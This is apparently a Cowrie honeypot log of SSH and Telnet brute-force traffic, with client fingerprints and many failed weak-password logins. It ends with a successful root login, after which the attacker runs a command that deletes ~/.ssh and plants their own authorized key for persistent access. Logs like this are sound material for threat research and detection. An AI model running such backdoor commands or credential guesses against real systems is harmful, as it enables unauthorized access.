{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:54:04.241836Z","src_ip":"212.227.235.229","session":"2a20ac066894"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45256,"dst_ip":"1.2.3.4","dst_port":22,"session":"de9037ad3e09","protocol":"ssh","message":"New connection: 212.227.235.229:45256 (1.2.3.4:22) [session: de9037ad3e09]","sensor":"my-vps","timestamp":"2025-09-09T05:54:22.011264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:54:22.012158Z","src_ip":"212.227.235.229","session":"de9037ad3e09"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:54:22.089571Z","src_ip":"212.227.235.229","session":"de9037ad3e09"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"abc123","message":"login attempt [testuser/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:54:22.441319Z","src_ip":"212.227.235.229","session":"de9037ad3e09"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:54:23.520759Z","src_ip":"212.227.235.229","session":"de9037ad3e09"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63128,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b5b25e53bdc","protocol":"ssh","message":"New connection: 217.72.205.35:63128 (1.2.3.4:22) [session: 0b5b25e53bdc]","sensor":"my-vps","timestamp":"2025-09-09T05:54:26.826429Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:54:26.827669Z","src_ip":"217.72.205.35","session":"0b5b25e53bdc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34107,"dst_ip":"1.2.3.4","dst_port":23,"session":"e44e7a1e1015","protocol":"telnet","message":"New connection: 212.227.235.229:34107 (1.2.3.4:23) [session: e44e7a1e1015]","sensor":"my-vps","timestamp":"2025-09-09T05:54:32.525460Z"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":47969,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3d915e38633","protocol":"ssh","message":"New connection: 213.6.203.226:47969 (1.2.3.4:22) [session: c3d915e38633]","sensor":"my-vps","timestamp":"2025-09-09T05:54:34.301391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:54:34.302186Z","src_ip":"213.6.203.226","session":"c3d915e38633"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:54:34.376363Z","src_ip":"213.6.203.226","session":"c3d915e38633"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"000000","message":"login attempt [oracle/000000] failed","sensor":"my-vps","timestamp":"2025-09-09T05:54:34.676915Z","src_ip":"213.6.203.226","session":"c3d915e38633"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:54:35.757651Z","src_ip":"213.6.203.226","session":"c3d915e38633"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48980,"dst_ip":"1.2.3.4","dst_port":22,"session":"3443dadae3ba","protocol":"ssh","message":"New connection: 212.227.235.229:48980 (1.2.3.4:22) [session: 3443dadae3ba]","sensor":"my-vps","timestamp":"2025-09-09T05:54:38.497000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:54:38.497879Z","src_ip":"212.227.235.229","session":"3443dadae3ba"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:54:38.743655Z","src_ip":"212.227.235.229","session":"3443dadae3ba"}
{"eventid":"cowrie.login.failed","username":"test3","password":"test3","message":"login attempt [test3/test3] failed","sensor":"my-vps","timestamp":"2025-09-09T05:54:39.766954Z","src_ip":"212.227.235.229","session":"3443dadae3ba"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:54:41.014796Z","src_ip":"212.227.235.229","session":"3443dadae3ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57574,"dst_ip":"1.2.3.4","dst_port":22,"session":"36f454046d6a","protocol":"ssh","message":"New connection: 212.227.235.229:57574 (1.2.3.4:22) [session: 36f454046d6a]","sensor":"my-vps","timestamp":"2025-09-09T05:54:44.813744Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:54:44.817840Z","src_ip":"212.227.235.229","session":"36f454046d6a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:54:45.082216Z","src_ip":"212.227.235.229","session":"36f454046d6a"}
{"eventid":"cowrie.login.failed","username":"user","password":"Password","message":"login attempt [user/Password] failed","sensor":"my-vps","timestamp":"2025-09-09T05:54:45.910128Z","src_ip":"212.227.235.229","session":"36f454046d6a"}
{"eventid":"cowrie.session.closed","duration":13.547890186309814,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:54:46.073281Z","src_ip":"212.227.235.229","session":"e44e7a1e1015"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:54:47.082486Z","src_ip":"212.227.235.229","session":"36f454046d6a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53646,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ba6a7cc61b7","protocol":"ssh","message":"New connection: 212.227.235.229:53646 (1.2.3.4:22) [session: 2ba6a7cc61b7]","sensor":"my-vps","timestamp":"2025-09-09T05:54:50.953893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:54:50.956807Z","src_ip":"212.227.235.229","session":"2ba6a7cc61b7"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:54:51.134093Z","src_ip":"212.227.235.229","session":"2ba6a7cc61b7"}
{"eventid":"cowrie.login.failed","username":"huser","password":"12345","message":"login attempt [huser/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T05:54:51.855267Z","src_ip":"212.227.235.229","session":"2ba6a7cc61b7"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:54:53.042431Z","src_ip":"212.227.235.229","session":"2ba6a7cc61b7"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":50598,"dst_ip":"1.2.3.4","dst_port":22,"session":"209eee61e37d","protocol":"ssh","message":"New connection: 92.118.39.62:50598 (1.2.3.4:22) [session: 209eee61e37d]","sensor":"my-vps","timestamp":"2025-09-09T05:55:16.377602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T05:55:16.378343Z","src_ip":"92.118.39.62","session":"209eee61e37d"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T05:55:16.408503Z","src_ip":"92.118.39.62","session":"209eee61e37d"}
{"eventid":"cowrie.login.failed","username":"bigdata","password":"bigdata","message":"login attempt [bigdata/bigdata] failed","sensor":"my-vps","timestamp":"2025-09-09T05:55:16.500956Z","src_ip":"92.118.39.62","session":"209eee61e37d"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:55:17.533086Z","src_ip":"92.118.39.62","session":"209eee61e37d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56056,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb3d4fbe79e7","protocol":"ssh","message":"New connection: 212.227.235.229:56056 (1.2.3.4:22) [session: bb3d4fbe79e7]","sensor":"my-vps","timestamp":"2025-09-09T05:55:21.786467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:55:21.787383Z","src_ip":"212.227.235.229","session":"bb3d4fbe79e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:55:21.865423Z","src_ip":"212.227.235.229","session":"bb3d4fbe79e7"}
{"eventid":"cowrie.login.failed","username":"apps","password":"apps123","message":"login attempt [apps/apps123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:55:22.220410Z","src_ip":"212.227.235.229","session":"bb3d4fbe79e7"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:55:23.301323Z","src_ip":"212.227.235.229","session":"bb3d4fbe79e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64181,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d735ecc0a88","protocol":"ssh","message":"New connection: 212.227.235.229:64181 (1.2.3.4:22) [session: 5d735ecc0a88]","sensor":"my-vps","timestamp":"2025-09-09T05:55:31.034653Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:55:31.035493Z","src_ip":"212.227.235.229","session":"5d735ecc0a88"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:55:31.170576Z","src_ip":"212.227.235.229","session":"5d735ecc0a88"}
{"eventid":"cowrie.login.failed","username":"ftpadmin","password":"1234567890","message":"login attempt [ftpadmin/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-09T05:55:31.737005Z","src_ip":"212.227.235.229","session":"5d735ecc0a88"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:55:32.870106Z","src_ip":"212.227.235.229","session":"5d735ecc0a88"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":63994,"dst_ip":"1.2.3.4","dst_port":22,"session":"18a795544616","protocol":"ssh","message":"New connection: 213.6.203.226:63994 (1.2.3.4:22) [session: 18a795544616]","sensor":"my-vps","timestamp":"2025-09-09T05:55:43.751295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:55:43.751987Z","src_ip":"213.6.203.226","session":"18a795544616"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:55:43.821399Z","src_ip":"213.6.203.226","session":"18a795544616"}
{"eventid":"cowrie.login.success","username":"root","password":"User12","message":"login attempt [root/User12] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:55:44.137461Z","src_ip":"213.6.203.226","session":"18a795544616"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:55:44.331086Z","src_ip":"213.6.203.226","session":"18a795544616"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:55:44.331864Z","src_ip":"213.6.203.226","session":"18a795544616"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:55:44.332979Z","src_ip":"213.6.203.226","session":"18a795544616"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:55:44.404241Z","src_ip":"213.6.203.226","session":"18a795544616"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:55:44.559840Z","src_ip":"213.6.203.226","session":"18a795544616"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:55:44.560639Z","src_ip":"213.6.203.226","session":"18a795544616"}
